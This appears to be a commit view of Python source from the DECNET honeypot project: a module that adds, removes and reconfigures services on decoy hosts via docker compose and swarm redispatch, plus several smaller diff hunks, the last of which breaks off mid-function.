    """Forward to :func:`decnet.engine.deployer._compose`.

    This thin seam exists so tests can
    ``monkeypatch.setattr(services_live, '_compose', ...)``. The deployer
    is imported at call time rather than at module import.

    ``compose_file`` is forwarded only when the caller supplied one, so
    the deployer's own default applies otherwise.
    """
    from decnet.engine.deployer import _compose as _deployer_compose

    forwarded: dict[str, Any] = {"env": env}
    if compose_file is not None:
        forwarded["compose_file"] = compose_file
    _deployer_compose(*args, **forwarded)
def _topology_compose_path(topology_id: str) -> Path:
    """Return the deployer's compose-file path for *topology_id*.

    Delegates to ``decnet.engine.deployer._topology_compose_path``, which
    is imported at call time.
    """
    from decnet.engine.deployer import _topology_compose_path as _deployer_path

    return _deployer_path(topology_id)
def _write_topology_compose(hydrated, path: Path) -> Path:
    """Render *hydrated* to *path* via ``decnet.topology.compose``.

    Returns whatever ``write_topology_compose`` returns. The generator is
    imported at call time.
    """
    from decnet.topology.compose import write_topology_compose as _render

    return _render(hydrated, path)
def _load_state():
    """Return the result of ``decnet.config.load_state()``.

    The config module is imported at call time.
    """
    from decnet.config import load_state as _config_load_state

    return _config_load_state()
def _save_state(config, compose_path) -> None:
    """Persist *config* and *compose_path* via ``decnet.config.save_state``.

    The config module is imported at call time.
    """
    from decnet.config import save_state as _config_save_state

    _config_save_state(config, compose_path)
def _write_compose(config, compose_path) -> None:
    """Write the fleet compose file via ``decnet.composer.write_compose``.

    The composer is imported at call time.
    """
    from decnet.composer import write_compose as _composer_write

    _composer_write(config, compose_path)
def _get_bus():
    """Return a bus from ``decnet.bus.factory.get_bus()``.

    The factory is imported at call time.
    """
    from decnet.bus.factory import get_bus as _bus_factory

    return _bus_factory()
# --------------------------- swarm propagation helpers ---------------------------
#
# Service mutations (add/remove/update_config) on a deployed decky used to run
# the master's local docker-compose only. For swarm fleet deckies the master
# has no containers; for agent-targeted topologies the master only writes a
# compose file the worker never sees. These helpers replay the change to the
# worker so the env actually lands.
#
# Lazy imports keep this module's import graph clean (composer/swarm pull in
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
    """Look up the ``host_uuid`` recorded on *decky_name*'s shard row.

    Scans ``repo.list_decky_shards()`` and returns the ``host_uuid`` of
    the first shard whose ``decky_name`` matches. Returns ``None`` when
    no shard matches, or when the matching shard has no ``host_uuid``.
    """
    shard_rows = await repo.list_decky_shards()
    return next(
        (
            row.get("host_uuid")
            for row in shard_rows
            if row.get("decky_name") == decky_name
        ),
        None,
    )
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
    """Push the deckies belonging to *host_uuid* back to that host's agent.

    Loads the master's fleet state, keeps only the deckies whose
    ``host_uuid`` attribute equals *host_uuid*, and hands a copy of the
    config restricted to them to ``dispatch_decnet_config``.

    Logs a warning and returns without dispatching when there is no
    fleet state or the state holds no deckies for that host.
    """
    from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config

    loaded = _load_state()
    if loaded is None:
        log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
        return

    config, _unused_compose_path = loaded
    shard = [
        decky for decky in config.deckies
        if getattr(decky, "host_uuid", None) == host_uuid
    ]
    if shard:
        await dispatch_decnet_config(
            config.model_copy(update={"deckies": shard}), repo,
        )
        return
    log.warning(
        "redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
        host_uuid,
    )
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
    """Resync *topology_id* to its worker, but only if it is agent-pinned.

    The topology is hydrated first. Nothing happens when it cannot be
    hydrated or when its ``topology.target_host_uuid`` is empty, which
    marks a unihost topology whose local compose file is authoritative.
    Otherwise the deployer's ``resync_agent_topology`` is awaited.
    """
    from decnet.engine.deployer import resync_agent_topology as _deployer_resync

    snapshot = await hydrate(repo, topology_id)
    pinned_to = (
        snapshot.get("topology", {}).get("target_host_uuid")
        if snapshot is not None
        else None
    )
    if pinned_to:
        await _deployer_resync(repo, topology_id)
log = get_logger("engine.services_live")
DeckyKind = Literal["fleet", "topology"]
class ServiceMutationError(ValueError):
    """Base error for service-mutation failures the caller can correct.

    The API layer picks a 4xx status from the concrete subclass. An
    instance of this base class itself is reported as 422.
    """


class ServiceNotFoundError(ServiceMutationError):
    """The decky or topology named in the request does not exist (404)."""


class ServiceConflictError(ServiceMutationError):
    """The service is already on, or already off, the decky (409)."""
def _validate_service_for_per_decky(name: str) -> BaseService:
    """Resolve *name* in the service registry for a per-decky mutation.

    Returns the registered service object.

    Raises:
        ServiceMutationError: *name* is not registered, or the service is
            flagged ``fleet_singleton``. Singleton services run once per
            fleet, so a per-decky add or remove is rejected outright
            rather than producing a no-op compose entry.
    """
    try:
        service = get_service(name)
    except KeyError as exc:
        raise ServiceMutationError(f"unknown service {name!r}") from exc
    if not service.fleet_singleton:
        return service
    raise ServiceMutationError(
        f"service {name!r} is fleet_singleton; not addable per-decky"
    )
async def _publish(topic: str, payload: dict[str, Any]) -> None:
    """Publish *payload* on *topic*, best effort.

    A bus is obtained from ``_get_bus()``, connected, used for a single
    publish and then closed. Any exception along the way is logged as a
    warning and swallowed, so a bus outage never fails the mutation.

    Args:
        topic: Bus topic to publish on.
        payload: Event body.
    """
    try:
        bus = _get_bus()
        await bus.connect()
        try:
            await bus.publish(topic, payload)
        finally:
            # Close even when publish raises, so a failed publish does
            # not leave the connection open.
            await bus.close()
    except Exception as e:  # noqa: BLE001
        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
# ---------------------------------------------------------- topology path
async def _topology_decky(
    repo: BaseRepository, topology_id: str, decky_name: str,
) -> dict[str, Any]:
    """Return the hydrated decky entry named *decky_name* in *topology_id*.

    A decky's name is taken from ``decky_config["name"]`` when present,
    otherwise from the entry's own ``name`` key.

    Raises:
        ServiceNotFoundError: the topology cannot be hydrated, or it has
            no decky with that name.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:
        raise ServiceNotFoundError(f"topology {topology_id!r} not found")

    def _entry_name(entry: dict[str, Any]) -> Any:
        return (entry.get("decky_config") or {}).get("name") or entry.get("name")

    found = next(
        (entry for entry in snapshot["deckies"] if _entry_name(entry) == decky_name),
        None,
    )
    if found is None:
        raise ServiceNotFoundError(
            f"decky {decky_name!r} is not in topology {topology_id!r}"
        )
    return found
async def _rerender_topology_compose(
    repo: BaseRepository, topology_id: str,
) -> Path:
    """Hydrate *topology_id* again and rewrite its compose file.

    Meant to run after the DB row has been updated, so the file on disk
    describes the new service set. A stale file would let a later
    ``up -d`` bring a removed service back.

    Returns:
        The path of the compose file that was written.

    Raises:
        ServiceNotFoundError: the topology can no longer be hydrated.
    """
    snapshot = await hydrate(repo, topology_id)
    if snapshot is None:  # pragma: no cover — narrow race
        raise ServiceNotFoundError(
            f"topology {topology_id!r} disappeared mid-mutation"
        )
    compose_path = _topology_compose_path(topology_id)
    _write_topology_compose(snapshot, compose_path)
    return compose_path
async def _add_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Attach *service_name* to a topology decky and bring it up.

    Steps, in order: persist the extended ``services`` list (plus
    *initial_config*, if any) on the decky row, re-render the topology
    compose file, then either resync the worker (agent-pinned topology)
    or run a targeted ``compose up`` for ``<decky_name>-<service_name>``
    locally.

    Returns:
        The decky's new services list.

    Raises:
        ServiceNotFoundError: unknown topology or decky.
        ServiceConflictError: the service is already on the decky.
    """
    decky = await _topology_decky(repo, topology_id, decky_name)
    current: list[str] = list(decky.get("services") or [])
    if service_name in current:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    services = [*current, service_name]

    changes: dict[str, Any] = {"services": services}
    if initial_config:
        # Store the config on the row before the compose file is
        # regenerated, so the first ``up`` already carries it and no
        # follow-up apply is needed.
        decky_config = dict(decky.get("decky_config") or {})
        per_service = dict(decky_config.get("service_config") or {})
        per_service[service_name] = initial_config
        decky_config["service_config"] = per_service
        changes["decky_config"] = decky_config

    await repo.update_topology_decky(decky["uuid"], changes)
    compose_path = await _rerender_topology_compose(repo, topology_id)

    if await _topology_is_agent_pinned(repo, topology_id):
        # The containers live on the worker. Ship it the new blob
        # instead of running compose on the master.
        await _resync_agent_topology(repo, topology_id)
        return services

    container = f"{decky_name}-{service_name}"

    def _bring_up() -> None:
        _compose(
            "up", "-d", "--no-deps", "--build", container,
            compose_file=compose_path,
        )

    # compose blocks, so it runs in a worker thread to keep the event
    # loop responsive.
    await anyio.to_thread.run_sync(_bring_up)
    return services
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
    """Tell whether *topology_id* is pinned to a worker host.

    True when the hydrated topology has a truthy
    ``topology.target_host_uuid``. False when it does not, or when the
    topology cannot be hydrated at all.
    """
    snapshot = await hydrate(repo, topology_id)
    return snapshot is not None and bool(
        snapshot.get("topology", {}).get("target_host_uuid")
    )
async def _remove_topology_service(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
) -> list[str]:
    """Detach *service_name* from a topology decky and tear it down.

    For a local (non agent-pinned) topology the service container is
    stopped and removed before anything is persisted. If compose fails
    part-way, the DB still lists the service and the operator can retry
    from a consistent state. The row and compose file are updated
    afterwards. An agent-pinned topology is resynced to its worker as
    the last step.

    Returns:
        The decky's services list with *service_name* removed.

    Raises:
        ServiceNotFoundError: unknown topology or decky.
        ServiceConflictError: the service is not on the decky.
    """
    decky = await _topology_decky(repo, topology_id, decky_name)
    current: list[str] = list(decky.get("services") or [])
    if service_name not in current:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    remaining = [name for name in current if name != service_name]

    container = f"{decky_name}-{service_name}"
    compose_path = _topology_compose_path(topology_id)
    pinned = await _topology_is_agent_pinned(repo, topology_id)

    if not pinned:
        def _stop() -> None:
            _compose("stop", container, compose_file=compose_path)

        def _remove() -> None:
            _compose("rm", "-f", container, compose_file=compose_path)

        await anyio.to_thread.run_sync(_stop)
        await anyio.to_thread.run_sync(_remove)

    await repo.update_topology_decky(decky["uuid"], {"services": remaining})
    await _rerender_topology_compose(repo, topology_id)

    if pinned:
        # Teardown of the removed service is left to the worker, which
        # receives the updated hydrated blob.
        await _resync_agent_topology(repo, topology_id)
    return remaining
# ---------------------------------------------------------- fleet path
def _fleet_state_or_raise() -> tuple[Any, Path]:
    """Return whatever ``_load_state()`` yields, refusing a ``None`` result.

    Callers in this module unpack the result as ``(config, compose_path)``.

    Raises:
        ServiceMutationError: no fleet state has been saved yet.
    """
    loaded = _load_state()
    if loaded is not None:
        return loaded
    raise ServiceMutationError(
        "no fleet state on disk — run `decnet up` first"
    )
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
for d in config.deckies:
if d.name == decky_name:
return d
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
async def _persist_fleet_change(
    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
) -> None:
    """Persist the mutation to JSON state, compose file, and the DB row.

    Args:
        repo: repository used to upsert the fleet decky row.
        decky: the caller's view of the decky being mutated. Its ``name``,
            ``ip``, optional ``host_uuid`` and optional ``service_config``
            are read.
        services: the post-mutation services list to store.
        compose_path: where the state/compose files are written.

    Raises:
        ServiceMutationError: the fleet state is no longer available.
        ServiceNotFoundError: the decky is missing from the reloaded state.
    """
    # Reload rather than reuse the caller's config. Going through
    # _fleet_state_or_raise turns a missing state file into a clean
    # ServiceMutationError instead of a tuple-unpacking TypeError.
    config, _ = _fleet_state_or_raise()
    target = _fleet_find_decky(config, decky.name)
    target.services = services

    # Callers (e.g. the add path) may have stashed a validated
    # service_config on *their* decky object before calling us. The reload
    # above may hand back a different object, so carry the stash across —
    # otherwise it never reaches the state file, the compose file, or the
    # DB row written below.
    pending_service_config = getattr(decky, "service_config", None)
    if pending_service_config:
        target.service_config = dict(pending_service_config)

    _save_state(config, compose_path)
    _write_compose(config, compose_path)

    # Mirror to the DB row so DB-only consumers (dashboard, API) see the
    # change without waiting for the reconciler.
    from decnet.web.db.models import LOCAL_HOST_SENTINEL
    await repo.upsert_fleet_decky({
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": services,
        "decky_config": target.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    })
async def _add_fleet_service(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    initial_config: dict | None = None,
) -> list[str]:
    """Append *service_name* to a fleet decky and bring its container up.

    After persisting, a decky that resolves to a swarm host gets its
    shard re-dispatched; otherwise the service is started through the
    local compose file in a worker thread.

    Returns:
        The post-mutation services list.

    Raises:
        ServiceConflictError: the service is already on the decky.
    """
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)

    updated: list[str] = list(decky.services or [])
    if service_name in updated:
        raise ServiceConflictError(
            f"service {service_name!r} already on decky {decky_name!r}"
        )
    updated.append(service_name)

    if initial_config:
        # Same approach as _update_fleet_service_config: park the
        # validated cfg on the decky model.
        per_service = dict(getattr(decky, "service_config", None) or {})
        per_service[service_name] = initial_config
        decky.service_config = per_service

    await _persist_fleet_change(repo, decky, updated, compose_path)

    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if swarm_host_uuid:
        # The master holds no container for this decky — re-push the
        # host's shard so the worker materialises the new service.
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
        return updated

    container = f"{decky_name}-{service_name}"

    def _bring_up():
        return _compose(
            "up", "-d", "--no-deps", "--build", container,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_bring_up)
    return updated
async def _remove_fleet_service(
    repo: BaseRepository, decky_name: str, service_name: str,
) -> list[str]:
    """Remove *service_name* from a fleet decky and return what remains.

    Raises:
        ServiceConflictError: the service is not on the decky.
    """
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)

    current: list[str] = list(decky.services or [])
    if service_name not in current:
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )
    remaining = [name for name in current if name != service_name]

    container = f"{decky_name}-{service_name}"
    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)

    if not swarm_host_uuid:
        # Local decky: stop + rm before persisting, so a compose failure
        # half-way leaves a clear state to retry from. Swarm deckies skip
        # this; the redispatch below drops the service from the config
        # the worker receives.
        for verb in (("stop",), ("rm", "-f")):
            await anyio.to_thread.run_sync(
                lambda verb=verb: _compose(
                    *verb, container, compose_file=compose_path,
                ),
            )

    await _persist_fleet_change(repo, decky, remaining, compose_path)

    if swarm_host_uuid:
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
    return remaining
# ---------------------------------------------------------- public api
async def add_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
    config: dict | None = None,
) -> list[str]:
    """Add *service_name* to a deployed decky.

    The service name is checked with ``_validate_service_for_per_decky``
    and a non-empty ``config`` is coerced via the service's
    ``validate_cfg`` before any state is written, so a validation
    failure leaves no side-effects. The mutation is then routed to the
    topology or fleet helper, and ``DECKY_SERVICE_ADDED`` is published
    on the decky's topic.

    Args:
        decky_kind: ``"topology"`` or ``"fleet"``.
        topology_id: required when ``decky_kind`` is ``"topology"``.
        config: optional initial service config; same dict shape the
            config endpoints accept.

    Returns:
        The post-mutation services list.

    Raises:
        ServiceMutationError: ``decky_kind`` is ``"topology"`` without a
            ``topology_id``, or ``decky_kind`` is unrecognised.
    """
    registry_entry = _validate_service_for_per_decky(service_name)
    initial_config = registry_entry.validate_cfg(config) if config else {}

    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _add_topology_service(
            repo, topology_id, decky_name, service_name,
            initial_config=initial_config,
        )
    elif decky_kind == "fleet":
        services = await _add_fleet_service(
            repo, decky_name, service_name,
            initial_config=initial_config,
        )
    else:  # pragma: no cover — Literal narrows
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_ADDED)
    event_payload = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(event_topic, event_payload)

    log.info(
        "services_live.add decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services
async def update_service_config(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    cfg: dict,
    apply: bool = False,
    topology_id: Optional[str] = None,
) -> dict:
    """Store ``cfg`` as the decky's ``service_config[service_name]``.

    ``cfg`` goes through the service's ``validate_cfg`` BEFORE anything
    is written, so a validation failure leaves no side-effects.

    ``apply=False`` (Save): persistence only; the running container
    keeps its old env.

    ``apply=True`` (Apply): same persistence, followed by a
    force-recreate of ``<decky>-<service>`` so the container picks up
    the new env. Destructive: any in-container session state on that
    service is dropped.

    Returns:
        The validated cfg that was stored.

    Raises:
        ServiceMutationError: ``decky_kind`` is ``"topology"`` without a
            ``topology_id``, or ``decky_kind`` is unrecognised.
    """
    registry_entry = _validate_service_for_per_decky(service_name)
    validated = registry_entry.validate_cfg(cfg)

    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        await _update_topology_service_config(
            repo, topology_id, decky_name, service_name, validated, apply=apply,
        )
    elif decky_kind == "fleet":
        await _update_fleet_service_config(
            repo, decky_name, service_name, validated, apply=apply,
        )
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED)
    event_payload = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "service_config": validated,
        "recreated": bool(apply),
    }
    await _publish(event_topic, event_payload)

    log.info(
        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
        decky_name, topology_id, service_name, apply,
    )
    return validated
async def _update_topology_service_config(
    repo: BaseRepository,
    topology_id: str,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a topology decky's config and optionally apply it.

    The decky's ``decky_config["service_config"]`` gets *validated*
    under *service_name*, the row is updated, and the compose file is
    re-rendered. With ``apply`` set, an agent-pinned topology is
    re-synced to its agent; otherwise the service container is
    force-recreated through the local compose file.

    Raises:
        ServiceConflictError: *service_name* is not on the decky.
    """
    decky = await _topology_decky(repo, topology_id, decky_name)
    if service_name not in (decky.get("services") or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    # Work on copies so the hydrated decky dict is not mutated in place.
    decky_config = dict(decky.get("decky_config") or {})
    per_service = dict(decky_config.get("service_config") or {})
    per_service[service_name] = validated
    decky_config["service_config"] = per_service

    await repo.update_topology_decky(decky["uuid"], {"decky_config": decky_config})
    compose_path = await _rerender_topology_compose(repo, topology_id)

    if not apply:
        return

    if await _topology_is_agent_pinned(repo, topology_id):
        await _resync_agent_topology(repo, topology_id)
        return

    container = f"{decky_name}-{service_name}"

    def _recreate():
        return _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", container,
            compose_file=compose_path,
        )

    await anyio.to_thread.run_sync(_recreate)
async def _update_fleet_service_config(
    repo: BaseRepository,
    decky_name: str,
    service_name: str,
    validated: dict,
    *,
    apply: bool,
) -> None:
    """Write *validated* into a fleet decky's config and optionally apply it.

    The state file, compose file and DB row are always updated. With
    ``apply`` set, a decky that resolves to a swarm host gets its shard
    re-dispatched; a local decky has its service container removed by
    name and then force-recreated through compose.

    Raises:
        ServiceConflictError: *service_name* is not on the decky.
    """
    config, compose_path = _fleet_state_or_raise()
    decky = _fleet_find_decky(config, decky_name)
    if service_name not in (decky.services or []):
        raise ServiceConflictError(
            f"service {service_name!r} not on decky {decky_name!r}"
        )

    per_service = dict(getattr(decky, "service_config", None) or {})
    per_service[service_name] = validated
    decky.service_config = per_service

    _save_state(config, compose_path)
    _write_compose(config, compose_path)

    from decnet.web.db.models import LOCAL_HOST_SENTINEL
    db_row = {
        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
        "name": decky.name,
        "services": list(decky.services or []),
        "decky_config": decky.model_dump(mode="json"),
        "decky_ip": decky.ip,
        "state": "running",
    }
    await repo.upsert_fleet_decky(db_row)

    if not apply:
        return

    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
    if swarm_host_uuid:
        await _redispatch_fleet_shard(repo, swarm_host_uuid)
        return

    container = f"{decky_name}-{service_name}"

    def _pre_remove():
        # Result is deliberately unchecked: a missing container is fine.
        return subprocess.run(  # nosec B603 B607
            ["docker", "rm", "-f", container],
            capture_output=True,
        )

    def _recreate():
        return _compose(
            "up", "-d", "--no-deps", "--force-recreate", "--build", container,
            compose_file=compose_path,
        )

    # Compose tracks the previous container by ID. When that container
    # is already gone (or was renamed during an earlier failed deploy),
    # --force-recreate fails with "No such container". Removing by name
    # first lets compose start from a clean slate.
    await anyio.to_thread.run_sync(_pre_remove)
    await anyio.to_thread.run_sync(_recreate)
async def remove_service(
    repo: BaseRepository,
    *,
    decky_kind: DeckyKind,
    decky_name: str,
    service_name: str,
    topology_id: Optional[str] = None,
) -> list[str]:
    """Remove *service_name* from a deployed decky.

    Routes to the topology or fleet helper, which take care of stopping
    the container and persisting the shorter services list, then
    publishes ``DECKY_SERVICE_REMOVED`` on the decky's topic.

    Args:
        decky_kind: ``"topology"`` or ``"fleet"``.
        topology_id: required when ``decky_kind`` is ``"topology"``.

    Returns:
        The post-mutation services list.

    Raises:
        ServiceMutationError: ``decky_kind`` is ``"topology"`` without a
            ``topology_id``, or ``decky_kind`` is unrecognised.
    """
    if decky_kind == "topology":
        if not topology_id:
            raise ServiceMutationError(
                "decky_kind=topology requires topology_id",
            )
        services = await _remove_topology_service(
            repo, topology_id, decky_name, service_name,
        )
    elif decky_kind == "fleet":
        services = await _remove_fleet_service(repo, decky_name, service_name)
    else:  # pragma: no cover
        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")

    event_topic = topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED)
    event_payload = {
        "decky_name": decky_name,
        "service_name": service_name,
        "topology_id": topology_id,
        "services": services,
    }
    await _publish(event_topic, event_payload)

    log.info(
        "services_live.remove decky=%s topology=%s service=%s",
        decky_name, topology_id, service_name,
    )
    return services

View File

@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
# Bind address for the master-side swarm controller. Loopback by default —
# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
# swarmctl-host in /etc/decnet/decnet.ini.
DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")
# Ingester batching: how many log rows to accumulate per commit, and the
# max wait (ms) before flushing a partial batch. Larger batches reduce

View File

@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
from decnet.geoip.lookup import Lookup
from decnet.geoip.paths import ensure_root
from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
from decnet.geoip.rir.parse import parse_file
from decnet.geoip.rir.parse import Range, parse_file
logger = logging.getLogger("decnet.geoip.rir.provider")
@@ -45,7 +45,7 @@ class RirProvider(Provider):
except Exception as exc:
logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)
ranges = []
ranges: list[Range] = []
for path in self.data_paths():
if not path.exists():
continue

View File

@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
self.component = component
def filter(self, record: logging.LogRecord) -> bool:
record.decnet_component = self.component # type: ignore[attr-defined]
record.decnet_component = self.component
return True
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
span = trace.get_current_span()
ctx = span.get_span_context()
if ctx and ctx.trace_id:
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
record.otel_trace_id = format(ctx.trace_id, "032x")
record.otel_span_id = format(ctx.span_id, "016x")
else:
record.otel_trace_id = "0" # type: ignore[attr-defined]
record.otel_span_id = "0" # type: ignore[attr-defined]
record.otel_trace_id = "0"
record.otel_span_id = "0"
except Exception:
record.otel_trace_id = "0" # type: ignore[attr-defined]
record.otel_span_id = "0" # type: ignore[attr-defined]
record.otel_trace_id = "0"
record.otel_span_id = "0"
return True

View File

@@ -289,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
return 0
drained = 0
for topo in pending:
tid = topo["id"]
tid = topo.id
try:
await _deployer.resync_agent_topology(repo, tid)
await repo.set_topology_resync(tid, False)
drained += 1
log.info("topology %s resynced to agent %s",
tid, topo.get("target_host_uuid"))
tid, topo.target_host_uuid)
except Exception as exc: # noqa: BLE001
log.warning(
"topology %s resync failed (will retry): %s", tid, exc,

View File

@@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
)
async def _materialise_lan_change(
    repo: Any,
    topology_id: str,
    *,
    created: Optional[tuple[str, str, bool]] = None,
    removed: Optional[str] = None,
) -> None:
    """Create or remove the docker bridge for a live LAN op + re-render compose.

    Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
    write lands. Skips when:

    * the topology does not exist or is not active/degraded (a pending
      topology gets its networks created at deploy time),
    * the topology is pinned to a swarm agent (cross-host materialisation
      isn't implemented; the agent's apply_topology RPC re-renders the
      whole compose at next push).

    Any failure from the docker SDK — including building the client —
    or from the networking primitives is logged, never re-raised: the
    DB row is the source of truth.

    Args:
        repo: repository exposing ``get_topology``.
        topology_id: topology the LAN belongs to.
        created: ``(name, subnet, is_dmz)`` of a LAN that was just added.
        removed: name of a LAN that was just removed.
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return
    if topology.status not in ("active", "degraded"):
        return
    if topology.target_host_uuid:
        _log.info(
            "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
            topology_id,
        )
        return

    # Lazy imports — these pull in docker.py / network.py which both
    # require the docker SDK; keeping them out of module-import keeps
    # the mutator usable in test environments that stub docker.
    import docker
    from decnet.engine.deployer import _topology_compose_path
    from decnet.network import create_bridge_network, remove_bridge_network
    from decnet.topology.compose import _network_name, write_topology_compose

    try:
        # Build the client INSIDE the guard: a client-construction
        # failure must be logged like every other docker failure here
        # instead of escaping to the caller after the DB write has
        # already landed.
        client = docker.from_env()

        if created is not None:
            name, subnet, is_dmz = created
            net_name = _network_name(topology_id, name)
            try:
                create_bridge_network(
                    client, net_name, subnet, internal=not is_dmz,
                )
            except Exception as exc:  # noqa: BLE001
                _log.error(
                    "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
                    topology_id, name, subnet, exc,
                )
                # Don't re-raise — the DB row is the source of truth.
                # Operator can retry by removing + re-adding the LAN.

        if removed is not None:
            net_name = _network_name(topology_id, removed)
            try:
                remove_bridge_network(client, net_name)
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live remove_lan: bridge remove failed topology=%s lan=%s: %s",
                    topology_id, removed, exc,
                )

        # Re-render compose so the file on disk matches the DB. Even
        # when the bridge create above failed, a future redeploy will
        # try to bring the network back from the compose definition.
        hydrated = await hydrate(repo, topology_id)
        if hydrated is not None:
            try:
                write_topology_compose(
                    hydrated, _topology_compose_path(topology_id),
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live LAN op: compose re-render failed topology=%s: %s",
                    topology_id, exc,
                )
    except Exception as exc:  # noqa: BLE001 — outer net for any docker SDK failure
        _log.error(
            "live LAN materialisation crashed topology=%s: %s",
            topology_id, exc,
        )
def _is_buildx_wedge(exc: BaseException) -> bool:
    """Tell whether *exc* carries both buildx-wedge signatures.

    The exception's ``stderr`` attribute (when present and non-empty)
    and its ``str()`` form are joined and lower-cased; the result is
    True only when both deployer signatures occur in that text. Both
    sources are consulted because ``_compose_with_retry`` raises a
    synthetic CalledProcessError whose ``stderr`` holds the recovery
    hint with the signatures in it.
    """
    from decnet.engine.deployer import (
        _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
    )

    raw_stderr = getattr(exc, "stderr", None)
    stderr_text = str(raw_stderr) if raw_stderr else ""
    # NOTE(review): only the haystack is lower-cased — this presumes
    # both signature constants are lower-case already; confirm.
    haystack = f"{stderr_text} {exc}".lower()
    return all(
        signature in haystack
        for signature in (_BUILDX_WEDGE_SIGNATURE, _BUILDX_EROFS_SIGNATURE)
    )
async def _compose_up_with_buildkit_fallback(
    *args: str, compose_file, label: str,
) -> None:
    """Run compose via ``_compose_with_retry``, retrying once without BuildKit.

    The first attempt runs as-is in a worker thread. If it raises and
    ``_is_buildx_wedge`` recognises the failure, a warning is logged and
    a single second attempt is made with ``DOCKER_BUILDKIT=0`` passed as
    ``env``. Any other failure is re-raised untouched, as is a failure
    of the second attempt.

    Args:
        *args: compose arguments forwarded verbatim.
        compose_file: compose file forwarded verbatim.
        label: human-readable identifier used only in the warning line,
            so the fall-back can be traced to the originating op.
    """
    import anyio
    from decnet.engine.deployer import _compose_with_retry

    def _invoke(**extra):
        return _compose_with_retry(*args, compose_file=compose_file, **extra)

    try:
        await anyio.to_thread.run_sync(_invoke)
    except Exception as exc:  # noqa: BLE001
        if not _is_buildx_wedge(exc):
            raise
        _log.warning(
